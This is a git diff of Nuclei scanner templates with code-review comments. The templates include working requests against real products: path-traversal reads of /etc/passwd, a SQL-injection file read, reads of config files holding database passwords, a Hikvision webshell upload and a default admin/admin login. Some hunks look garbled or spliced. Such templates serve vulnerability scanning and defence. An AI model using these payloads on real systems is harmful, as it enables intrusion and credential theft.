4a0a0047304502207d3e73d53cf79e65756b7ea8f63d32afb7c504cb49a5ce7c3eac1011cf700524022100eb99c5aa18691eacf4a8b477f61ddf4409d217306fff52ac289f07a5c96044c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/viminfo-disclosure.yaml b/poc/exposed/viminfo-disclosure.yaml new file mode 100644 index 0000000000..946f2225ca --- /dev/null +++ b/poc/exposed/viminfo-disclosure.yaml 
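Review bot: The second request's word matcher fires on generic PHP error fragments (`Warning:`, `Fatal error`, `header already sent`) under `condition: or`, none of which proves a filesystem path was disclosed, so any PHP notice on a 200 page gets reported as Full Path Disclosure; a `type: regex` entry such as `'(?i)in (/[^\s<]+|[a-z]:\\[^\s<]+) on line \d+'` ties the match to an absolute path. The info block has no `description`; `vBulletin error pages reveal the absolute filesystem path of the installation.` states the issue. `stop-at-first-match: true` with the first-request body matcher keeps `max-request: 11` accurate, which is good.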
@@ -0,0 +1,40 @@ +id: viminfo-disclosure + +info: + name: Viminfo - File Disclosure + author: DhiyaneshDK + severity: low + description: | + Viminfo file was detected. + reference: + - https://renenyffenegger.ch/notes/development/vim/editing/viminfo/index + metadata: + verified: true + max-request: 1 + shodan-query: html:"Viminfo" + tags: devops,exposure,viminfo,config + +http: + - method: GET + path: + - "{{BaseURL}}/.viminfo" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Viminfo version' + - 'Command Line History' + condition: and + + - type: word + part: header + words: + - 'application/octet-stream' + + - type: status + status: + - 200 + +# digest: 490a004630440220778d9bfb13df46593453e6e11bbae8931112f2d6b97b5e4a5825d0eeae42af8202202f27116c557a1ee76a284cc98400bdb792a88f95295f2b710cc4fb110a936278:922c64590222798bb761d5b6d8e72950 diff --git a/poc/exposed/zzzcms-info-disclosure.yaml b/poc/exposed/zzzcms-info-disclosure.yaml new file mode 100644 index 0000000000..a79ec2a893 --- /dev/null +++ b/poc/exposed/zzzcms-info-disclosure.yaml 
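Review bot: The header matcher in viminfo-disclosure.yaml accepts only `application/octet-stream`, so a server whose MIME map falls back to `text/plain` for dotfiles returns the same leaked history but is not reported; the body words `Viminfo version` and `Command Line History` already identify the file, and the content-type check mainly excludes HTML error pages. Suggest either listing both types, `words: - 'application/octet-stream' - 'text/plain'`, or replacing the header check with a negative matcher on `text/html`. The one-line `description: Viminfo file was detected.` could also say what is at stake: `A .viminfo file is web-readable; it records command-line history, search patterns and recently edited file paths, which can expose internal paths and anything typed into the editor.`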
@@ -0,0 +1,42 @@ +id: zzzcms-info-disclosure + +info: + name: Zzzcms 1.75 - Information Disclosure + author: ritikchaddha + severity: low + description: | + There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore + reference: + - https://xz.aliyun.com/t/7414 + metadata: + verified: true + max-request: 1 + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,info,disclosure + +http: + - raw: + - | + GET /plugins/webuploader/js/webconfig.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var adminpath' + - 'var imageMaxSize=' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# digest: 4a0a0047304502202a3a4916c5fadccff982078fec5a98de45b89076f013e080cad56b7f25fd7327022100bc6f7789895c6bb952913f2990bb4214961e49148417b7b16e969c14585ea09d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/ftp/wing-ftp-service-detect.yaml b/poc/ftp/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..551f2631dd --- /dev/null +++ b/poc/ftp/wing-ftp-service-detect.yaml 
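Review bot: The description in zzzcms-info-disclosure.yaml is a loose translation ("rather strange file", "No need to blast admin and add 3 digits anymore") that reads as attacker commentary rather than a statement of the exposure; suggest `description: webconfig.php under plugins/webuploader/js echoes values from the otherwise inaccessible zzz_config.php, including the admin panel path, to unauthenticated clients.` The same file, byte for byte (identical blob id a79ec2a893), is added again as poc/microsoft/zzzcms-info-disclosure.yaml in a later hunk on this page; ZzzCMS is not a Microsoft product, so the second copy looks misfiled and will produce duplicate findings under the same `id`. The tags `info,disclosure` also differ from the `exposure` tagging the sibling exposure templates on this page use.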
@@ -0,0 +1,25 @@ +id: wing-ftp-service-detect + +info: + name: Wing FTP Service - Detect + author: ritikchaddha + severity: info + description: | + The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + metadata: + verified: true + max-request: 1 + shodan-query: "Wing FTP Server" + tags: tech,ftp,wing,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Wing FTP Server" +# digest: 4b0a00483046022100c80a28fe09665c71ca345c950405518bec7b02defcbed410c0a59c743e24da46022100bc4ae224a03b1cecc0f9646db3ce15f82e26125b2eb0fd647cd0ba7395be4be9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/google/google-secrets.yaml b/poc/google/google-secrets.yaml index a689838b9d..d9cb5cef3a 100644 --- a/poc/google/google-secrets.yaml +++ b/poc/google/google-secrets.yaml @@ -15,21 +15,21 @@ file: extractors: - type: regex - name: google-api-key + name: facebook-access-token regex: - - "AIza[0-9A-Za-z\\\\-_]{35}" + - "EAACEdEose0cBA[0-9A-Za-z]+" - type: regex - name: google-cloud-platform-api-key + name: facebook-client-id regex: - - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" + - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" - type: regex - name: google-oauth + name: facebook-oauth regex: - - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" + - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" - type: regex - name: google-oauth-access-token + name: facebook-secret-key regex: - - "ya29\\\\.[0-9A-Za-z\\\\-_]+" + - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" diff --git a/poc/java/default-apache-shiro.yaml b/poc/java/default-apache-shiro.yaml new file mode 100644 index 0000000000..259a94706c --- /dev/null +++ b/poc/java/default-apache-shiro.yaml 
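Review bot: The description in wing-ftp-service-detect.yaml is a definition of FTP in general and says nothing about what the template detects; suggest `description: Detects a Wing FTP Server web interface by the "Wing FTP Server" string in its response headers.` The template also has no `reference` entry for the product, unlike the other detection templates on this page.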
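Review bot: In the third new regex of google-secrets.yaml, `[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K]`, the `|` inside each bracket expression is a literal character rather than alternation, so every class also matches `|` and the whole thing is just a verbose case-insensitive `facebook`; the trailing `['|\\\"]` classes have the same problem. Replace it with `"(?i)facebook.*['\\\"][0-9a-f]{32}['\\\"]"`, matching the escaping style of the fourth pattern. Separately, after this hunk the file named google-secrets.yaml contains only Facebook extractors (`facebook-access-token`, `facebook-client-id`, `facebook-oauth`, `facebook-secret-key`) while its `id` line, outside the hunk, presumably still says google; the Google patterns were replaced rather than moved, so either restore them and put the Facebook set in its own template or rename this file and id consistently.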
@@ -0,0 +1,29 @@ +id: default-apache-shiro + +info: + name: Apache Shiro Default Page + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Apache Shiro Quickstart" + tags: tech,apache,shiro + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Shiro Quickstart" + + - type: status + status: + - 200 + +# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/java/tomcat-stacktraces.yaml b/poc/java/tomcat-stacktraces.yaml index 876539da2d..0f7b97d0f1 100644 --- a/poc/java/tomcat-stacktraces.yaml +++ b/poc/java/tomcat-stacktraces.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Tomcat" - tags: tech,tomcat,apache + tags: misconfig,tech,tomcat,apache http: - method: GET @@ -24,5 +24,4 @@ http: - 'contains(body, "org.apache")' - status_code == 400 condition: and - -# digest: 490a004630440220572e2b9041be621d66d3b022211cce1f42722ddb282c272ac5473ada2a5d725e02200538acfc5a3bce45b1698ca25c662be74514ea7138deb20e34ad21d908a4ce89:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/javascript/custom-css-js-php.yaml b/poc/javascript/custom-css-js-php.yaml new file mode 100644 index 0000000000..efbbeaf2e4 --- /dev/null +++ b/poc/javascript/custom-css-js-php.yaml 
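Review bot: default-apache-shiro.yaml has no `description`, so a reader of the result has to infer why a "default page" with `severity: info` is reported at all; suggest `description: The Apache Shiro Quickstart sample application is deployed and reachable; sample or demo applications should not be exposed on production hosts.` A `reference` to the Shiro quickstart documentation would also help triage. The tomcat-stacktraces hunks on this line only change a tag and a digest and need no review.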
@@ -0,0 +1,59 @@ +id: custom-css-js-php + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/javascript/ojs-installer.yaml b/poc/javascript/ojs-installer.yaml index 475df3c1b2..6d3f4b7439 100644 --- a/poc/javascript/ojs-installer.yaml +++ b/poc/javascript/ojs-installer.yaml @@ -4,6 +4,7 @@ info: name: Open Journal Systems Installer - Exposure author: DhiyaneshDK severity: high + description: Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 2 
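Review bot: The info block of custom-css-js-php.yaml (hunk starts on the previous line) ships with empty fields: `description: >` has no text, and `cvss-metrics:`, `cvss-score:` and `cve-id:` under classification are blank while the tags claim `cve`; `shodan-query: 'vuln:'` is a placeholder as well. Either fill these from the Wordfence advisory already cited in `reference` or drop the empty keys and the `cve` tag, since an empty `cve-id` carries no identifier and `cve` in the tags will mislead filtering. The two `version` extractors are identical except for `internal: true`; as far as I know a named extractor is available to the `compare_versions` dsl matcher whether or not it is internal, so one extractor should do — confirm against the extractor documentation before collapsing them. The ojs-installer hunk on this line adds only a description and needs no review.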
@@ -28,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a73a5709ab5c8ffc95f1edb4434f2ef96a93e741785901596f6864bdcfa563d5022100f88c3bfbc5d5b8cce6a260f47f8100f4f58f0ab7ede9bbb5bcd59ae0bd789c0a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009f6ccce9560273afe2ff39ce76b4e4763a54d111855520c5310097bad41b820e022100aa5c15214f4bb1d146046ae5597dd068d8bd5fce23b91b0790dd3dfde6361c50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/joomla/joomla-config-dist-file.yaml b/poc/joomla/joomla-config-dist-file.yaml old mode 100755 new mode 100644 index 023399c215..676958e944 --- a/poc/joomla/joomla-config-dist-file.yaml +++ b/poc/joomla/joomla-config-dist-file.yaml @@ -1,35 +1,31 @@ id: joomla-config-dist-file + info: name: Joomla Config Dist File - author: - - l0ne1y - description: |- - joomla配置文件泄露 - php-dist是Joomla创建的用来保存Joomla设置的文件,未经允许的访问会导致敏感信息泄露 + author: oppsec severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - http://www.joomla.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + description: configuration.php-dist is a file created by Joomla to save Joomla settings. + tags: config,exposure,joomla + requests: -- matchers: - - type: word - condition: and - words: - - Joomla - - JConfig - - '@package' - - type: word - part: header - words: - - text/plain - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/configuration.php-dist' - method: GET + - method: GET + path: + - "{{BaseURL}}/configuration.php-dist" + + matchers-condition: and + matchers: + - type: word + words: + - "Joomla" + - "JConfig" + - "@package" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 diff --git a/poc/local_file_inclusion/acti-video-lfi.yaml b/poc/local_file_inclusion/acti-video-lfi.yaml new file mode 100644 index 0000000000..e5dcc8dca8 --- /dev/null 
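Review bot: The rewritten joomla-config-dist-file.yaml uses the top-level `requests:` key while every other template on this page uses `http:`; `requests` is the legacy spelling and mixing the two in one repository invites loader warnings and inconsistent tooling, so `http:` is preferable here. The rewrite also drops the `metadata` block entirely (no `max-request`, `verified` or search queries, which the sibling templates carry) and removes the remediation text without an English replacement, so the new side is less documented than the old. Restoring `metadata: max-request: 1` and extending the description, e.g. `description: configuration.php-dist is the Joomla configuration template shipped with the install; when it is web-readable it reveals the installation's configuration layout and indicates that distribution files were not removed after setup.`, would address that. The ojs-installer hunk on this line is digest-only.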
+++ b/poc/local_file_inclusion/acti-video-lfi.yaml @@ -0,0 +1,39 @@ +id: acti-video-lfi + +info: + name: ACTi-Video Monitoring - Local File Inclusion + author: DhiyaneshDk + severity: high + description: | + ACTI video surveillance has loopholes in reading any files + reference: + - https://www.cnblogs.com/hmesed/p/16292252.html + metadata: + verified: true + max-request: 1 + shodan-query: title:"Web Configurator" + fofa-query: app="ACTi-视频监控" + tags: acti,lfi,iot,video,monitoring + +http: + - method: GET + path: + - "{{BaseURL}}/images/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100b740ba6fc1aece72e634dd7f2c10ac3d13ca38392f48f8ac1470efbc64891fae022100a05aead43e2ec6f1973fdb9b3c5dea959517f6edea370fbbafba94b698b9331e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/kingsoft-vgm-lfi.yaml b/poc/local_file_inclusion/kingsoft-vgm-lfi.yaml new file mode 100644 index 0000000000..a76d986b40 --- /dev/null +++ b/poc/local_file_inclusion/kingsoft-vgm-lfi.yaml 
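Review bot: The description in acti-video-lfi.yaml, `ACTI video surveillance has loopholes in reading any files`, is a machine translation; suggest `description: The ACTi video surveillance web configurator does not canonicalise paths requested under /images/, allowing unauthenticated clients to read arbitrary files from the device.` The header matcher pins `application/octet-stream`, so a device that labels the response `text/plain` would be missed even though the `root:.*:0:0:` body regex already confirms the file; consider whether the body regex plus status 200 is sufficient on its own.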
@@ -0,0 +1,39 @@ +id: kingsoft-vgm-lfi + +info: + name: Kingsoft VGM Antivirus - Arbitrary File Read + author: abbas.heybati + severity: high + description: | + There is an arbitrary file reading vulnerability in Kingsoft Antivirus. An attacker can obtain any file on the server through the vulnerability. + reference: + - https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486073&idx=1&sn=8e61e162262585bb8ce973b61df989b4&chksm=c1f925cbf68eacddfe441b8f1861e88068039712e467fb9bbe91eae31d439286c7147d197b07 + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/kongsoft-vgm-antivirus-wall-rce.yaml + metadata: + verified: true + max-request: 1 + fofa-query: title="金山VGM防毒墙" + tags: kingsoft,vgm,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/downFile.php?filename=../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/force-download" + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100f2502080be7eb0c3cc36d778e65dac2e50b2dc8930e92e8253154de9305015ab0220536c3849100109e24770d3ade708928f6be51ee39cb53ef97cb149042ae724c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/sangfor-ngaf-lfi.yaml b/poc/local_file_inclusion/sangfor-ngaf-lfi.yaml new file mode 100644 index 0000000000..142ad12c55 --- /dev/null +++ b/poc/local_file_inclusion/sangfor-ngaf-lfi.yaml 
@@ -0,0 +1,42 @@ +id: sangfor-nextgen-lfi + +info: + name: Sangfor Next Gen Application Firewall - Arbitary File Read + author: DhiyaneshDk + severity: high + description: | + Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter. + reference: + - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/ + metadata: + verified: true + max-request: 1 + fofa-query: title="SANGFOR | NGAF" + tags: sangfor,lfi + +http: + - raw: + - | + GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1 + Host: {{Hostname}} + y-forwarded-for: 127.0.0.1 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: word + part: header + words: + - 'filename="passwd"' + - 'application/octet-stream' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402202cfdd0a7a3b428ae596b4c3c2585bdfca6af1d52d6bae1bd48607673cfcf61a702201405d5b3d2ba9179e851823ff6f7839a50c368493c42717e9dfb1fce07963e22:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/weaver-officeserver-lfi.yaml b/poc/local_file_inclusion/weaver-officeserver-lfi.yaml new file mode 100755 index 0000000000..4e1aa20a48 --- /dev/null +++ b/poc/local_file_inclusion/weaver-officeserver-lfi.yaml 
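Review bot: `id: sangfor-nextgen-lfi` in the new sangfor-ngaf-lfi.yaml does not match the filename, which breaks the id-equals-filename convention the other new templates on this page follow and makes selection by `-id` surprising; suggest `id: sangfor-ngaf-lfi`. The name also misspells the check: `name: Sangfor Next Gen Application Firewall - Arbitrary File Read`.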
@@ -0,0 +1,35 @@ +id: weaver-officeserver-lfi + +info: + name: OA E-Office officeserver.php Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20officeserver.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-EOffice" + tags: weaver,e-cology,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "datapassword =" + - "datauser =" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100fb9aeeb75f2885f9cc403726aa4d125ca77e8facb6edec2abaffd3cafd4b4509022100e2c4560b8ffe79150e0285b4fa87e5cc1c59869c3c34f7153bd336365e6dc3b3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml b/poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml new file mode 100755 index 0000000000..5d042369f3 --- /dev/null +++ b/poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml 
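Review bot: weaver-officeserver-lfi.yaml is added with `new file mode 100755`, as are weaver-signaturedownload-lfi.yaml and weaver-sptmforportalthumbnail-lfi.yaml in the next two hunks; YAML templates are data, not executables, and every other new file on this page is 100644, so the executable bit should be dropped. Product tagging across the Weaver templates is also inconsistent: this file tags `e-cology` for an E-Office endpoint, the signaturedownload and thumbnail templates tag `ecology` and `e-cology` respectively for E-Weaver, and the mysql_config template later on the page tags `ecology` for E-Office again. Pick one spelling per product (for example `eoffice` for E-Office and `ecology` for E-cology/E-Weaver) so that tag filters select the right set.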
@@ -0,0 +1,42 @@ +id: weaver-signaturedownload-lfi + +info: + name: OA E-Weaver SignatureDownLoad - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-E-Weaver" + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DriverClasses" + - "ecology.password" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + - "markPicture.jpg" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a004830460221009c7c7fbcc6408d7a1d23b362176285fb7d990fd0b0b5785b7235a8a8304ef38a022100e87911cec4d1ab35b9459482066c0fb80c90ccc0bb05850c8e4621645ddae578:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml b/poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml new file mode 100755 index 0000000000..36d8cc98dd --- /dev/null +++ b/poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml 
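Review bot: The tags of weaver-signaturedownload-lfi.yaml omit the mechanism the request depends on: the path carries `markId=0 union select ...`, so this is an SQL-injection-driven file read rather than a path traversal, yet it is tagged only `lfi`. Adding `sqli` to the tags and saying so in the description (`The markId parameter of weaver.file.SignatureDownLoad is not parameterised; an injected UNION SELECT controls the file path that is returned.`) classifies it correctly for filtering and points remediation at the query, not just at path validation.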
@@ -0,0 +1,41 @@ +id: weaver-sptmforportalthumbnail-lfi + +info: + name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading. + reference: + - http://124.223.89.192/archives/e-cology8-14 + - https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-E-Weaver" + tags: weaver,e-cology,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "weaver.general.BaseBean" + - "getServletConfig" + condition: and + + - type: word + part: header + words: + - "image/png" + + - type: status + status: + - 200 + +# digest: 4a0a004730450220781ac3c5267b2f1315f8f10652cbfe1c4aaefd5b665e5e33b1b02617218dcce5022100e65c3fce695fe99f73741f270f84b9b53c5400a46d7e6e84908dfcd5180ea22d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml b/poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml new file mode 100644 index 0000000000..217e6d4453 --- /dev/null +++ b/poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml 
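Review bot: The first reference in weaver-sptmforportalthumbnail-lfi.yaml, `http://124.223.89.192/archives/e-cology8-14`, is a bare-IP HTTP URL; it is neither a durable nor an attributable source and could serve unrelated content tomorrow, so it should be replaced by an archived or named-host reference or removed, keeping the pxplan GitHub link. The description's `directly spliced` presumably means concatenated; `description: The preview parameter of SptmForPortalThumbnail.jsp is concatenated onto the web root without validation, allowing any file under it to be downloaded.` reads more clearly.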
@@ -0,0 +1,34 @@ +id: yonyou-ufida-nc-lfi + +info: + name: UFIDA NC Portal - Arbitrary File Read + author: DhiyaneshDk + severity: high + description: | + There is any file reading in the getFileLocal interface of UFIDA Mobile System Management. + reference: + - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8B%E7%A7%BB%E5%8A%A8%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86getFileLocal%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md + metadata: + verified: true + max-request: 1 + fofa-query: app="用友-移动系统管理" + tags: yonyou,ufida,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "nc.bs.framework.server.WebApplicationStartupHook" + - "]>&test;111112331%' union select md5({{num}})# + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5(num)}}' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
@@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - 
".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/microsoft/bloofoxcms-default-login.yaml b/poc/microsoft/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..94317594f5 --- /dev/null +++ b/poc/microsoft/bloofoxcms-default-login.yaml @@ -0,0 +1,42 @@ +id: bloofoxcms-default-login + +info: + name: bloofoxCMS - Default Login + author: theamanrawat + severity: high + description: | + bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.bloofox.com/automated_setup.113.html + - https://www.bloofox.com + metadata: + verified: "true" + max-request: 1 + fofa-query: "Powered by bloofoxCMS" + tags: bloofox,cms,default-login + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - contains(body, 'bloofoxCMS Admincenter') + - status_code == 200 + condition: and + +# digest: 